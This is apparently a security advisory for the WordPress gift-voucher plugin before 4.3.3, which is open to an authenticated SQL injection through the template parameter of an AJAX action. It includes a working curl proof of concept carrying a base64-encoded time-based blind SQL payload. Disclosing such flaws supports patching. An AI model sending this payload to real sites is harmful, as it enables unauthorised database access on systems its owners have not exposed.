The plugin does not properly sanitise and escape the template parameter before using it in a SQL statement via the wpgv_doajax_voucher_pdf_save_func AJAX action, leading to a SQL injection exploitable by any authenticated user, such as a subscriber. The parameter is base64 encoded: the value in the proof of concept below decodes to (CASE WHEN (1016=1016) THEN SLEEP(5) ELSE 1016 END), a time-based blind payload, so a successful request is recognised by a response delayed by about five seconds.
Proof of concept (the request must be sent with the cookies of an authenticated session, for example a subscriber's, and the nonce replaced with a current one for that session):
curl "http://$TARGET_HOST/wp-admin/admin-ajax.php" --data "action=wpgv_doajax_voucher_pdf_save_func&nonce=af77cd5581&template=KENBU0UgV0hFTiAoMTAxNj0xMDE2KSBUSEVOIFNMRUVQKDUpIEVMU0UgMTAxNiBFTkQp&buying_for=&for=&from=&value=&message=&code=&shipping=&shipping_email=&firstname=&lastname=&email=&address=&pincode=&shipping_method=&paymentmethod="
CPE

Name | Operator | Version
---|---|---
gift-voucher | lt | 4.3.3